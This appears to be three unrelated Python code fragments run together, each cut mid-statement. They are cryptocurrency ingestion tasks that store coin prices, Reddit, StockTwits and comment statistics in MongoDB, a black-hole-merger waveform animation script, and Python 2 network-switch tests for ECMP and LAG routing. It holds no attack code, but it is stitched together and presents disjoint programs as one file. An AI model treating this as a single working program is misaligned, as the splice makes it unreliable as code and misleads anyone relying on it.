self.__merge_cc_data(current_coins, cc_coins) processed = 0 coin_updates = 0 for coin in current_coins: links = self.__get_links(coin) if links is None: continue for name, val in links.items(): coin[name] = val in_db = coin["cmc_id"] in stored_ids if not in_db: coin["_id"] = db.next_sequence_id("coins") self._db_insert("coins", coin) else: stored_coin = stored_coins_map[coin["cmc_id"]] coin["_id"] = stored_coin["_id"] # Update only if changed if coin != stored_coin: # fields will allow to be updated only if not empty. # This prevents removing good data if we simply failed to get the data this time. # This has the drawback that bad data won't get removed # The only draw back is that if bad data got corrected to be empty # we would not remove it here, but we can deal with that manually for now updateable = {"cc_id", "subreddit", "twitter", "btctalk_ann", "icon"} updates = {} for field in updateable: current = coin[field] if field in coin else "" stored = stored_coin[field] if field in stored_coin else "" if current != stored and len(current) > 0: updates[field] = current if len(updates) > 0: coin_updates += 1 self._db_update_one("coins", coin["_id"], updates) processed += 1 self._progress(processed, len(current_coins)) print("Total coins", len(current_coins)) print("Added", len(new_ids), "new coins") print("Updated", coin_updates) class ImportHistoricalData(mgr.IngestionTask): """Task to Import historical daily data from a specified DataSource""" def __init__(self, collection, data_source, coin_filter=None): """ :param collection: the db collection to store the data :param data_source: the DataSource used to get the data :param coin_filter: optional to filter which coins to use """ super().__init__() self.__collection = collection self.__data_source = data_source self.__coin_filter = coin_filter self._name += "-" + collection @staticmethod def _outdated(coins, latest_updates): """Returns a list of coins with outdated data in the db""" coins_to_update = {} # Make a list of coins that don't have up to date historical data for coin in coins: coin_id = coin["_id"] update_start = datetime.datetime(2011, 1, 1) if coin_id in latest_updates: most_recent = latest_updates[coin_id]["date"] today = datetime.datetime.utcnow() if today.day - most_recent.day <= 1: continue update_start = most_recent + datetime.timedelta(days=1) coins_to_update[coin_id] = update_start return coins_to_update def _run(self): coins = db.get_coins(self.__coin_filter) latest_data = db.get_latest(self.__collection) coins_to_update = self._outdated(coins, latest_data) print("Coins with no {} data: {}".format(self.__collection, len(coins) - len(latest_data))) print("Coins with out of date {} data: {}".format(self.__collection, len(coins_to_update))) processed = 0 coins = util.list_to_dict(coins, "_id") for coin_id in coins_to_update: coin = coins[coin_id] update_start = coins_to_update[coin_id] new_data = self._get_data(self.__data_source(coin, start=update_start)) if new_data: for day in new_data: day["coin_id"] = coin["_id"] self._db_insert(self.__collection, new_data) print("Added all historical", self.__collection, "data for", coin["symbol"]) else: self._error("no historical data found for {}, starting on {}".format(coin["symbol"], update_start)) processed += 1 self._progress(processed, len(coins_to_update)) class ImportPrices(mgr.IngestionTask): """Task to import current prices for all coins""" def _run(self): data = self._get_data(cmc.Ticker()) if not data: self._fatal("Failed to get coinmarketcap ticker") # Need to map coinmarketcap ids back to ours stored_coins = db.get_coins() id_map = {} for coin in stored_coins: id_map[coin["cmc_id"]] = coin["_id"] for coin in data: cmc_id = coin["cmc_id"] if cmc_id in id_map: coin["coin_id"] = id_map[cmc_id] del coin["cmc_id"] else: self._error("Can't add price data to unknown coin {}".format(cmc_id)) # filter out coins we haven't seen yet # we'll pick them up after our ImportCoinList runs again data = [x for x in data if "coin_id" in x] self._db_insert("prices", data) class ImportRedditStats(mgr.IngestionTask): """Task to import current reddit stats""" def __init__(self, collection, get_stats): super().__init__() self.__collection = collection self.__get_stats = get_stats self._name += "-" + collection def _run(self): coins = db.get_coins({"subreddit": {"$exists": True}}) processed = 0 with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor: future_to_coin = {executor.submit(self._get_data, self.__get_stats, coin["subreddit"]): coin for coin in coins} for future in concurrent.futures.as_completed(future_to_coin): coin = future_to_coin[future] try: today = datetime.datetime.utcnow() stats = future.result() if stats: stats["date"] = today stats["coin_id"] = coin["_id"] self._db_insert(self.__collection, stats) else: self._error("Failed to get reddit stats for r/{}".format(coin["subreddit"])) except Exception as err: self._error("Failed to get future results for r/{}, {}".format(coin["subreddit"], err)) processed += 1 self._progress(processed, len(coins)) class ImportStockTwits(mgr.IngestionTask): """Task to import recent StockTwits posts""" def __init__(self, collection, num_posts=2): super().__init__() self.__collection = collection self.num_posts = num_posts def _run(self): coins = st.CoinList() coins = self._get_data(coins) for coin in range(len(coins.iloc[:self.num_posts,:])): posts = st.recentPosts(coins.loc[coin, 'symbol'] + '.X', coins.loc[coin, 'coin_id'], coins.loc[coin, 'name']) posts = self._get_data(posts) self._db_insert(self.__collection, posts) class ImportCommentStats(mgr.IngestionTask): """Task to import social media comment stats""" def __init__(self, collection, comment_scanner, coin_filter, max_workers=5): super().__init__() self.__comment_scanner = comment_scanner self.__collection = collection self.__coin_filter = coin_filter self.__max_workers = max_workers self._name += "-" + collection def _run(self): coins = db.get_coins(self.__coin_filter) hours = 1 processed = 0 with concurrent.futures.ThreadPoolExecutor(max_workers=self.__max_workers) as executor: future_to_coin = {} for coin in coins: scanner = self.__comment_scanner(coin, hours) fut = executor.submit(scanner.find_comments) future_to_coin[fut] = (coin, scanner) for future in concurrent.futures.as_completed(future_to_coin): coin, scanner = future_to_coin[future] try: now = datetime.datetime.utcnow() record = { "date": now, "coin_id": coin["_id"], "count": scanner.count(), "sum_score": scanner.sum_score(), "avg_score": scanner.avg_score(), "avg_sentiment": scanner.avg_sentiment(), "strong_pos": scanner.count_strong_pos(), "strong_neg": scanner.count_strong_neg() } self._db_insert(self.__collection, record) strong_pos = scanner.strong_pos() strong_neg = scanner.strong_neg() # Remove old comments to reduce storage requirements now = datetime.datetime.utcnow() max_age = now - datetime.timedelta(days=200) db.mongo_db.recent_comments.remove({"date": {"$lt": max_age}}) for comment in strong_pos + strong_neg: r = { "date": now, "coin_id": coin["_id"], "text": comment.text, "score": comment.score, "sentiment": comment.sentiment, "platform": self.__collection } self._db_insert("recent_comments", r) except Exception as err: self._error("Failed to get future results for r/{}, {}".format(coin["subreddit"], err)) processed += 1 self._progress(processed, len(coins)) class ImportCryptoCompareStats(mgr.IngestionTask): """Task to import stats from cryptocompare""" def _run(self): coins = db.get_coins({"cc_id": {"$exists": True}}) processed = 0 for coin in coins: stats = self._get_data(cc.SocialStats(coin["cc_id"])) if stats: stats["date"] = datetime.datetime.utcnow() stats["coin_id"] = coin["_id"] self._db_insert("cryptocompare_stats", stats) else: self._warn("No stats for coin {}".format(coin["symbol"])) processed += 1 self._progress(processed, len(coins)) class DownloadCoinIcons(mgr.IngestionTask): """Task to download icon image files for all coins""" def _run(self): coins = db.get_coins({"icon": {"$exists": True}}) processed = 0 for coin in coins: missing = db.mongo_db.coin_icons.find_one({"coin_id": coin["_id"]}) is None if "icon" in coin and len(coin["icon"]) > 0 and
q/(1.+q) mB = 1./(1.+q) # Get mesh grid on bottom plane to generate waveform sph_gridX, gridX, sph_gridY, gridY, sph_gridZ, gridZ \ = get_grids_on_planes(11, max_range) # evaluate remnant fit fit_name = 'surfinBH7dq2' fit = surfinBH.LoadFits(fit_name) # If omega_ref is None, will assume the spins are given in the # coorbital frame at t=-100M mf, chif, vf, mf_err, chif_err, vf_err \ = fit.all(q, chiA, chiB, omega0=omega_ref) # Get Bh shapes assuming fixed spin magnitudes shape_BhA = get_BH_shape(mA, chiA) shape_BhB = get_BH_shape(mB, chiB) shape_BhC = get_BH_shape(mf, chif) #print(np.linalg.norm(chif)) #print(np.linalg.norm(vf)) #print(np.linalg.norm(vf) * 3 * 10**5) # Will stop plotting waveform after this time # long enough for waveform pattern to disappear, taking into account # propagation delay waveform_end_time = 50 + 2*max_range if uniform_time_step_size is None: # Use large step size after ringdown to exaggerate kicks dt_remnant = 100 else: dt_remnant = uniform_time_step_size # common time array: After waveform_end_time, each step is 100M t = np.append(t_binary[t_binary<waveform_end_time], \ np.arange(waveform_end_time, 10000+waveform_end_time, dt_remnant)) if HANGUP_HACKS: t = t[t - t[0] <= 4100] # assume merger is at origin BhC_traj = np.array([tmp*t for tmp in vf]) # Attaching 3D axis to the figure ax = axes3d.Axes3D(fig) if not no_wave_time_series: l, b, w, h = ax.get_position().bounds if rescale_fig_for_widgets: ax.set_position([l, b + 0.25*h, w*0.7, 0.75*h ]) # axes to plot waveform time series hax = fig.add_axes([0.135, 0.08, 0.5, 0.17]) hax.clear() else: ax.set_position([l, b + 0.25*h, w, 0.75*h ]) # axes to plot waveform time series hax = fig.add_axes([0.135, 0.08, 0.83, 0.17]) # estimate maximum of waveform for scale of timeseries hmax_est = np.max(np.abs(get_waveform_timeseries(h_nrsur, 0, 90))) hax.set_ylim([ -hmax_est, hmax_est ]) if HANGUP_HACKS: hax.set_xlim(0, 4100) if auto_rotate_camera: camera_traj = get_camera_trajectory(t_binary) else: camera_traj = None if LOW_DEF: time_fontsize = 5 properties_fontsize = 5 properties_text_yloc = 0.75 freeze_fontsize = 7 timestep_fontsize = 6 label_fontsize = 5 ticks_fontsize = 5 title_fontsize = 7 ticks_pad = -5 label_pad = -11 else: time_fontsize = 12 properties_fontsize = 10 properties_text_yloc = 0.8 freeze_fontsize = 14 timestep_fontsize = 12 label_fontsize = 10 ticks_fontsize = 10 title_fontsize = 14 ticks_pad = 0 label_pad = 0 time_text = ax.text2D(0.03, 0.05, '', transform=ax.transAxes, \ fontsize=time_fontsize, zorder=zorder_dict['info_text']) properties_text = ax.text2D(0.05, properties_text_yloc, '', \ transform=ax.transAxes, fontsize=properties_fontsize, \ zorder=zorder_dict['info_text']) freeze_text = ax.text2D(0.6, 0.7, '', transform=ax.transAxes, \ fontsize=freeze_fontsize, color=colors_dict['info'], \ zorder=zorder_dict['notice_text']) timestep_text = ax.text2D(0.45, 0.7, '', transform=ax.transAxes, \ fontsize=timestep_fontsize, color=colors_dict['info'], \ zorder=zorder_dict['notice_text']) # NOTE: Can't pass empty arrays into 3d version of plot() dataLines_binary = [BhA_traj, BhB_traj, 1, 1, 1] # get wavefrom at viewpoint h_viewpoint = get_waveform_timeseries(h_nrsur, ax.azim, ax.elev) if LOW_DEF: arrow_mutation_scale = 10 else: arrow_mutation_scale = 20 traj_alpha = 0.8 lines = [\ # These two are for plotting component tracjectories ax.plot(BhA_traj[0,0:1]-1e10, BhA_traj[1,0:1], BhA_traj[2,0:1], \ color=colors_dict['BhA_traj'], lw=2, alpha=traj_alpha, \ zorder=zorder_dict['traj'])[0], \ ax.plot(BhB_traj[0,0:1]-1e10, BhB_traj[1,0:1], BhB_traj[2,0:1], \ color=colors_dict['BhB_traj'], lw=2, alpha=traj_alpha, \ zorder=zorder_dict['traj'])[0], \ # These two are for plotting component BH spins ax.add_artist(Arrow3D(None, mutation_scale=arrow_mutation_scale, \ lw=3, arrowstyle="-|>", color=colors_dict['BhA_spin'], \ zorder=zorder_dict['spin'])), \ ax.add_artist(Arrow3D(None, mutation_scale=arrow_mutation_scale, \ lw=3, arrowstyle="-|>", color=colors_dict['BhB_spin'], \ zorder=zorder_dict['spin'])), \ # This is for plotting angular momentum direction ax.add_artist(Arrow3D(None, mutation_scale=arrow_mutation_scale, \ lw=3, arrowstyle="-|>", color=colors_dict['L'], \ zorder=zorder_dict['L'])), \ # This is for plotting remnant spin ax.add_artist(Arrow3D(None, mutation_scale=arrow_mutation_scale, \ lw=3, arrowstyle="-|>", color=colors_dict['BhC_spin'], \ zorder=zorder_dict['spin'])), \ ] if not no_wave_time_series: lines += [ \ # These two is for plotting the waveform time series hax.plot(t_binary, np.real(h_viewpoint), label='$h_+$', \ color=colors_dict['h+'], lw=1.2)[0], \ hax.plot(t_binary, np.imag(h_viewpoint), label='$h_{\\times}$', \ color=colors_dict['hx'], lw=1.2)[0], \ # This is for plotting the slider along the waveform time series hax.axvline(x=t_binary[0]), \ ] hax.legend(loc='upper left', ncol=2) hax.set_xlabel('$t\,(M)$', fontsize=label_fontsize) hax.set_ylabel('$h\,r/M$', fontsize=label_fontsize) hax.tick_params(axis='x', which='major', labelsize=ticks_fontsize) hax.tick_params(axis='y', which='major', labelsize=ticks_fontsize) dataLines_remnant = [1] # Setting the axes properties # This seems to set the actual limits to max_range ax.set_xlim3d([-max_range*0.96, max_range*0.96]) ax.set_ylim3d([-max_range*0.96, max_range*0.96]) ax.set_zlim3d([-max_range*0.96, max_range*0.96]) ax.set_xlabel('$x\,(M)$', fontsize=label_fontsize) ax.set_ylabel('$y\,(M)$', fontsize=label_fontsize) ax.set_zlabel('$z\,(M)$', fontsize=label_fontsize) ax.xaxis.pane.set_edgecolor('black') ax.yaxis.pane.set_edgecolor('black') ax.zaxis.pane.set_edgecolor('black') ax.set_facecolor('white') #ax.xaxis._axinfo['tick']['inward_factor'] = 0 #ax.yaxis._axinfo['tick']['inward_factor'] = 0 #ax.zaxis._axinfo['tick']['inward_factor'] = 0 ax.xaxis._axinfo['tick']['outward_factor'] = 0 ax.yaxis._axinfo['tick']['outward_factor'] = 0 ax.zaxis._axinfo['tick']['outward_factor'] = 0 ax.tick_params(axis='x', which='major', pad=ticks_pad, \ labelsize=ticks_fontsize) ax.tick_params(axis='y', which='major', pad=ticks_pad, \ labelsize=ticks_fontsize) ax.tick_params(axis='z', which='major', pad=ticks_pad, \ labelsize=ticks_fontsize) ax.xaxis.labelpad = label_pad ax.yaxis.labelpad = label_pad ax.zaxis.labelpad = label_pad -3 if not no_surrogate_label: ax.set_title('NRSur7dq2 + %s'%fit_name, fontsize=time_fontsize, \ x=0.74, y=0.99) # number of frames to include in orbit trace hist_frames = int(0.75*(PTS_PER_ORBIT)) # Will freeze video at this index freeze_idx = np.argmin(np.abs(t - FREEZE_TIME)) # color range for contourf # Get linthresh from first index. With SymLogNorm, whenever the # value is less than linthresh, the color scale is linear. Else log. linthresh = np.max(np.abs(get_waveform_on_grid(t, 0, h_nrsur, sph_gridZ))) # Get vmax from waveform at peak. Add in propagation delay zero_idx = np.argmin(np.abs(t-max_range)) vmax = np.max(get_waveform_on_grid(t, zero_idx, h_nrsur, \ sph_gridZ)) # Symmetric about 0 vmin = -vmax #NOTE: There is a glitch if I don't skip the first index frames = range(1, len(t)) if HANGUP_HACKS: ## Use this if you want to speed up the movie when using a low ## uniform_time_step_size frames = np.sort(np.append(range(1,len(t))[::5],np.argmin(np.abs(t)))) hist_frames = 100 if not no_freeze_near_merger: # Repeat freeze_idx 75 times, this is a hacky way to freeze the video frames = np.sort(np.append(frames, [freeze_idx]*75)) use_Kerr = not use_spin_angular_momentum_for_arrows fargs = (lines, hist_frames, t, t_binary, dataLines_binary, \ dataLines_remnant, properties_text, freeze_text, timestep_text, \ time_text, max_range, BhA_traj, BhB_traj, BhC_traj, L, h_nrsur, \ shape_BhA, shape_BhB, shape_BhC, \ sph_gridX, gridX, sph_gridY, gridY, sph_gridZ, gridZ, \ q, mA, mB, chiA_nrsur, chiB_nrsur, mf, chif, vf, \ waveform_end_time, freeze_idx, draw_full_trajectory, ax, \ vmin, vmax, linthresh, camera_traj, height_map, \ project_on_all_planes, no_wave_time_series, \ no_freeze_near_merger, no_time_label, use_Kerr) # save still and exit if still_time is not None: time_tag = '%d'%(abs(still_time)) if still_time < 0: time_tag = 'm%s'%time_tag update_lines(np.argmin(np.abs(t-still_time)), *fargs) still_fnametag = '%s_%s'%(save_file.split('.')[0], time_tag) P.savefig('%s.png'%still_fnametag, bbox_inches='tight') P.savefig('%s.pdf'%still_fnametag, bbox_inches='tight') exit() line_ani = animation.FuncAnimation(fig, update_lines, frames, \ fargs=fargs, \ interval=50, blit=False, repeat=True, repeat_delay=5e3) return line_ani class CustomFormatter(argparse.ArgumentDefaultsHelpFormatter, \ argparse.RawDescriptionHelpFormatter): pass ############################# main ################################## if __name__ == '__main__': parser = argparse.ArgumentParser(description=__doc__, formatter_class=CustomFormatter) pp_standard = parser.add_argument_group("Standard options") pp_standard.add_argument('--q', type=float, required=True, help='Mass ratio. Currently 1 <= q <= 2.') pp_standard.add_argument('--chiA', type=float, required=True, nargs=3, help='Dimensionless spin of BhA at omega_ref. List of size 3.') pp_standard.add_argument('--chiB', type=float, required=True, nargs=3, help='Dimensionless spin of BhB at omega_ref. List of size 3.') pp_standard.add_argument('--omega_ref', type=float, default=None, help='Reference orbital frequency, in units ' \ 'of rad/M. Currently, >= 0.018. If specified, assumes the above ' \ 'spins are specified at this frequency, in the coorbital frame. ' \ 'Else, assumes the spins are specified at t=-100M from the peak ' \ 'of the waveform, in the coorbital frame. ' \ 'The coorbital frame is defined as: ' \ 'The z-axis is along the orbital angular momentum at that ' \ 'time/frequency. '\ 'The x-axis is along the line of separation from the smaller BH ' \ 'to the larger BH at that time/frequency. ' \ 'The y-axis completes the triad. ' \ ) pp_standard.add_argument('--save_file', type=str, default=None, help='File to save animation to. If given, will save animation to ' \ 'this file. Else will show animation. Use this option if live ' \ 'rendering is slow. Allowed extensions are mp4 and gif. mp4 has ' \ 'the best quality. We use lower quality for gif to reduce file ' \ 'size. Example: --save_file movie.mp4') pp_standard.add_argument('--auto_rotate_camera', default=False, \ action='store_true', \ help='Auto rotates camera viewing angle. You can see the waveform ' \ 'change.') pp_special = parser.add_argument_group( \ "Non standard options (mainly for developers)") pp_special.add_argument('--project_on_all_planes', default=False, \ action='store_true', \ help='If given, projects the waveform on all three back planes. ' \ 'By default only does the x-y plane at the bottom. This can ' \ 'interfere with the BH shapes. This is disabled if ' \ 'auto_rotate_camera is set.') pp_special.add_argument('--height_map', default=False, \ action='store_true', \ help='Map h to a height to visualize in the xy plane ' \ 'instead of a contour plot. Turns off project_on_all_planes.') pp_special.add_argument('--draw_full_trajectory', default=False, \ action='store_true', \ help='If given, draws the entire trajectories of the components. ' \ 'Else only retains the last 3/4th of an orbit.') pp_special.add_argument('--use_spin_angular_momentum_for_arrows', \ default=False, action='store_true', \ help='By default the spin arrows are proportional to the Kerr ' \ 'parameter a. If this is
from rif to lag member total_changing_ports = 15 #the first port that will start as rif, that means that the first iteratio will only have port #1 first_changing_port = 2 total_dst_port = 16 v4_enabled = 1 v6_enabled = 1 ip_mask = '255.255.0.0' addr_family = SAI_IP_ADDR_FAMILY_IPV4 lag_members = [] nhop_group = 0 lag = 0 lag_rif = 0 port_rifs = [] neighbors = [] nhops = [] nhop_gmembers = [] routes = [] vr_id = 0 mac_action = SAI_PACKET_ACTION_FORWARD src_port = 0 mac_pool = [] def setup_ecmp_lag_group(self, first_rif_port): self.lag = self.client.sai_thrift_create_lag([]) #adding lag members self.lag_members.append(sai_thrift_create_lag_member(self.client, self.lag, port_list[1])) for i in range(self.first_changing_port,first_rif_port): self.lag_members.append(sai_thrift_create_lag_member(self.client, self.lag, port_list[i])) self.lag_rif = sai_thrift_create_router_interface(self.client, self.vr_id, SAI_ROUTER_INTERFACE_TYPE_PORT, self.lag, 0, self.v4_enabled, self.v6_enabled, '') sai_thrift_create_neighbor(self.client, self.addr_family, self.lag_rif, "10.10.0.1", self.mac_pool[self.total_changing_ports]) sai_thrift_create_route(self.client, self.vr_id,self.addr_family, "10.10.0.1", '255.255.255.0', self.lag_rif) self.nhops.append(sai_thrift_create_nhop(self.client, self.addr_family, "10.10.0.1" , self.lag_rif)) for i in range(first_rif_port,self.total_changing_ports): self.port_rifs.append(sai_thrift_create_router_interface(self.client, self.vr_id, SAI_ROUTER_INTERFACE_TYPE_PORT, port_list[i], 0, self.v4_enabled, self.v6_enabled, '')) for i in range(len(self.port_rifs)): sai_thrift_create_neighbor(self.client, self.addr_family, self.port_rifs[i], "10.10.%s.1" % str(i+1), self.mac_pool[i]) self.nhops.append(sai_thrift_create_nhop(self.client, self.addr_family, "10.10.%s.1" % str(i+1), self.port_rifs[i])) sai_thrift_create_route(self.client, self.vr_id, self.addr_family, "10.10.%s.1" % str(i+1), '255.255.255.0', self.port_rifs[i]) self.nhop_group = sai_thrift_create_next_hop_group(self.client) for nhop in self.nhops: self.nhop_gmembers.append(sai_thrift_create_next_hop_group_member(self.client, self.nhop_group, nhop)) sai_thrift_create_route(self.client, self.vr_id, self.addr_family, "10.20.0.0", self.ip_mask, self.nhop_group) def teardown_ecmp_lag_group(self, first_rif_port): sai_thrift_remove_route(self.client, self.vr_id, self.addr_family, "10.20.0.0", self.ip_mask, self.nhop_group) sai_thrift_remove_route(self.client, self.vr_id, self.addr_family, "10.10.0.1", '255.255.255.0', self.lag_rif) for i in range(self.total_changing_ports - first_rif_port): sai_thrift_remove_route(self.client, self.vr_id, self.addr_family, "10.10.%s.1" % str(i+1), '255.255.255.0', self.port_rifs[i]) for nhop_gmember in self.nhop_gmembers: self.client.sai_thrift_remove_next_hop_group_member(nhop_gmember) self.client.sai_thrift_remove_next_hop_group(self.nhop_group) for nhop in self.nhops: self.client.sai_thrift_remove_next_hop(nhop) del self.nhops[:] for i in range(self.total_changing_ports - first_rif_port): sai_thrift_remove_neighbor(self.client, self.addr_family, self.port_rifs[i], "10.10.%s.1" % str(i+1), self.mac_pool[i]) print self.port_rifs for rif in self.port_rifs: self.client.sai_thrift_remove_router_interface(rif) del self.port_rifs[:] for lag_member in self.lag_members: self.client.sai_thrift_remove_lag_member(lag_member) del self.lag_members[:] sai_thrift_remove_neighbor(self.client, self.addr_family, self.lag_rif, "10.10.0.1", self.mac_pool[self.total_changing_ports]) self.client.sai_thrift_remove_router_interface(self.lag_rif) self.client.sai_thrift_remove_lag(self.lag) def polarizationCheck(self,packets,avg): if (avg < 150): self.assertTrue((packets >= (avg * 0.65)),"Not all paths are equally balanced, %s" % packets) self.assertTrue((packets <= (avg * 1.35)),"Not all paths are equally balanced, %s" % packets) else: self.assertTrue((packets >= (avg * 0.8)),"Not all paths are equally balanced, %s" % packets) self.assertTrue((packets <= (avg * 1.2)),"Not all paths are equally balanced, %s" % packets) def send_and_verify_packets(self, first_rif_port): exp_pkts = [0]*self.total_dst_port pkt_counter = [0] * self.total_dst_port destanation_ports = range(self.total_dst_port + 1) sport = 0x1234 dport = 0x50 src_mac_start = '00:22:22:22:{0}:{1}' IP_LAST_WORD_RANGE = 254 IP_2ND_LAST_WORD_RANGE = 16 for i in xrange(IP_LAST_WORD_RANGE): for j in xrange(IP_2ND_LAST_WORD_RANGE): ip_src = '10.0.' + str(j) + '.' + str(i+1) ip_dst = '10.20.' + str(j+1) + '.1' src_mac = src_mac_start.format(str(i).zfill(4)[:2], str(i).zfill(4)[2:]) pkt = simple_tcp_packet( eth_dst=router_mac, eth_src=src_mac, ip_src=ip_src, ip_dst=ip_dst, ip_id=i, tcp_sport=sport, tcp_dport=dport, ip_ttl=64) exp_pkt = simple_tcp_packet( eth_dst=self.mac_pool[0], eth_src=router_mac, ip_src=ip_src, ip_dst=ip_dst, ip_id=i, tcp_sport=sport, tcp_dport=dport, ip_ttl=63) masked_exp_pkt = Mask(exp_pkt) masked_exp_pkt.set_do_not_care_scapy(ptf.packet.Ether,"dst") send_packet(self, 0, str(pkt)) (match_index,rcv_pkt) = verify_packet_any_port(self,masked_exp_pkt,destanation_ports) logging.debug("Found expected packet from port %d" % destanation_ports[match_index]) pkt_counter[match_index] += 1 sport = random.randint(0,0xffff) dport = random.randint(0,0xffff) #final uniform distribution check logging.debug(pkt_counter) logging.debug(first_rif_port) lag_packets = sum(pkt_counter[1:first_rif_port]) lag_average = lag_packets/(len(self.lag_members) + 1) logging.debug("the sum of packets through the lag is " + str(lag_packets)) logging.debug("the lag average for the lag is " + str(lag_average)) for stat_port in range(1,first_rif_port): logging.debug( "PORT #"+str(stat_port)+":") logging.debug(str(pkt_counter[stat_port])) self.polarizationCheck(pkt_counter[stat_port],lag_average) rifs_average = sum(pkt_counter)/(len(self.port_rifs) + 1) logging.debug("lag average " + str(lag_average)) self.polarizationCheck(lag_packets,rifs_average) for stat_port in range(first_rif_port,self.total_changing_ports): logging.debug( "PORT #"+str(stat_port)+":") logging.debug(str(pkt_counter[stat_port])) self.polarizationCheck(pkt_counter[stat_port],rifs_average) def runTest(self): """ For sai server, testing different lags with router ---- Test for 16 ports minimun ---- Steps 1. Create virtual router, and rif for src port 2. create a lag and lag rif,add ports to the lag and the rest of the ports connect to rifs 3. configure neighbors, nhops for all of the rifs 4. make ecmp route with all of the nhops 5. send packets from src port 6. check polarization check in the lag and in the ecmp 7. remove rifs, neighbors, nhops, lag members, lag and route 8. repeat steps 3-7 with differnt numbers of lag members and rifs 8. clean up. """ print print "L3MultipleEcmpLagTest" #general configuration random.seed(1) switch_init(self.client) if (len(port_list) < (self.total_dst_port + 1) ) : assert False, "skip this test as it requires 17 ports" self.src_port = port_list[0] for i in range (self.total_dst_port+1): self.mac_pool.append('00:11:22:33:44:'+str(50+i)) self.vr_id = sai_thrift_create_virtual_router(self.client, self.v4_enabled, self.v6_enabled) rif_port_id = sai_thrift_create_router_interface(self.client, self.vr_id, SAI_ROUTER_INTERFACE_TYPE_PORT, self.src_port, 0, self.v4_enabled, self.v6_enabled, '') try: # The first iteration will configure port #1 as a lag with only one member # and will configure port #2 to port #15 as rifs, # the rif will advance until all of the ports will be in lag and only one if port for first_rif_port in range(self.first_changing_port,self.total_changing_ports): print "Testing with " + str(first_rif_port - 1) + " lag members." self.setup_ecmp_lag_group(first_rif_port) self.send_and_verify_packets(first_rif_port) self.teardown_ecmp_lag_group(first_rif_port) finally: #in case of an exception in the send_and_verify_packets self.teardown_ecmp_lag_group(self.total_dst_port)#check what number to send for tear down self.client.sai_thrift_remove_router_interface(rif_port_id) self.client.sai_thrift_remove_virtual_router(self.vr_id) print "END OF TEST" @group('l3') @group('1D') class L3BridgeAndSubPortRifTest(sai_base_test.ThriftInterfaceDataPlane): def runTest(self): print "" switch_init(self.client) v4_enabled = 1 v6_enabled = 1 vlan1_id = 10 vlan2_id = 100 port1 = port_list[0] port2 = port_list[1] port3 = port_list[2] port4 = port_list[3] mac1 = '00:01:01:01:01:01' ip1 = '11.11.11.1' mac2 = '00:02:02:02:02:02' ip2 = '10.10.10.2' ip_addr_subnet = '10.10.10.0' ip_mask = '255.255.255.0' mac3 = '00:22:22:22:22:22' ip3 = '10.0.0.1' vlan1_oid = sai_thrift_create_vlan(self.client, vlan1_id) vlan2_oid = sai_thrift_create_vlan(self.client, vlan2_id) bridge_id = sai_thrift_create_bridge(self.client, SAI_BRIDGE_TYPE_1D) sai_thrift_vlan_remove_ports(self.client, switch.default_vlan.oid, [port2, port3, port4]) bport1_id = sai_thrift_create_bridge_sub_port(self.client, port2, bridge_id, vlan2_id) bport2_id = sai_thrift_create_bridge_sub_port(self.client, port3, bridge_id, vlan2_id) bport3_id = sai_thrift_create_bridge_sub_port(self.client, port4, bridge_id, vlan2_id) vr_id = sai_thrift_create_virtual_router(self.client, v4_enabled, v6_enabled) sub_port_rif_oid = sai_thrift_create_router_interface(self.client, vr_id, SAI_ROUTER_INTERFACE_TYPE_SUB_PORT, port1, vlan1_oid, v4_enabled, v6_enabled, '') bridge_rif_oid = sai_thrift_create_router_interface(self.client, vr_id, SAI_ROUTER_INTERFACE_TYPE_BRIDGE, 0, 0, v4_enabled, v6_enabled, '') bridge_rif_bp = sai_thrift_create_bridge_rif_port(self.client, bridge_id, bridge_rif_oid) sai_thrift_create_neighbor(self.client, SAI_IP_ADDR_FAMILY_IPV4, bridge_rif_oid, ip2, mac2) sai_thrift_create_route(self.client, vr_id, SAI_IP_ADDR_FAMILY_IPV4, ip_addr_subnet, ip_mask, bridge_rif_oid) local_pkt = simple_tcp_packet(eth_src=mac2, eth_dst=mac3, dl_vlan_enable=True, vlan_vid=vlan2_id, ip_src=ip2, ip_dst=ip3, ip_id=102, ip_ttl=64) L3_pkt = simple_tcp_packet(eth_src=mac1, eth_dst=router_mac, ip_src=ip1, ip_dst=ip2, dl_vlan_enable=True, vlan_vid=vlan1_id, ip_id=105, ip_ttl=64) exp_pkt = simple_tcp_packet(eth_src=router_mac, eth_dst=mac2, ip_src=ip1, ip_dst=ip2, dl_vlan_enable=True, vlan_vid=vlan2_id, ip_id=105, ip_ttl=63) try: print "Sending packet ({} -> {}) : Sub-port rif (port 1 : vlan {}) -> Bridge rif (flooded)".format(ip1, ip2, vlan1_id) send_packet(self, 0, str(L3_pkt)) verify_packets(self, exp_pkt, [1, 2, 3]) print "Success" print "Sending unknown L2 packet [{} -> {}] to learn FDB and flood within a .1D bridge".format(mac1, mac3) send_packet(self, 1, str(local_pkt)) verify_packets(self, local_pkt, [2, 3]) print "Success" print "Sending packet ({} -> {}) : Sub-port rif (port 1 : vlan {}) -> Bridge rif".format(ip1, ip2, vlan1_id) send_packet(self, 0, str(L3_pkt)) verify_packets(self, exp_pkt, [1]) print "Success" finally: sai_thrift_remove_route(self.client, vr_id, SAI_IP_ADDR_FAMILY_IPV4, ip_addr_subnet, ip_mask, bridge_rif_oid) sai_thrift_remove_neighbor(self.client, SAI_IP_ADDR_FAMILY_IPV4, bridge_rif_oid, ip2, mac2) self.client.sai_thrift_remove_router_interface(sub_port_rif_oid) self.client.sai_thrift_remove_bridge_port(bridge_rif_bp) self.client.sai_thrift_remove_router_interface(bridge_rif_oid) self.client.sai_thrift_remove_virtual_router(vr_id) sai_thrift_remove_bridge_sub_port(self.client, bport1_id, port2) sai_thrift_remove_bridge_sub_port(self.client, bport2_id, port3) sai_thrift_remove_bridge_sub_port(self.client, bport3_id, port4) self.client.sai_thrift_remove_bridge(bridge_id) self.client.sai_thrift_remove_vlan(vlan1_oid) self.client.sai_thrift_remove_vlan(vlan2_oid) sai_thrift_create_vlan_member(self.client, switch.default_vlan.oid, port2, SAI_VLAN_TAGGING_MODE_UNTAGGED) sai_thrift_create_vlan_member(self.client, switch.default_vlan.oid, port3, SAI_VLAN_TAGGING_MODE_UNTAGGED) sai_thrift_create_vlan_member(self.client, switch.default_vlan.oid, port4, SAI_VLAN_TAGGING_MODE_UNTAGGED) @group('l3') @group('1D') class L3SubPortAndVLANRifTest(sai_base_test.ThriftInterfaceDataPlane): def runTest(self): print "" switch_init(self.client) port1 = port_list[0] port2 = port_list[1] v4_enabled = 1 v6_enabled = 1 vlan1_id = 10 vlan2_id = 100 mac_action = SAI_PACKET_ACTION_FORWARD 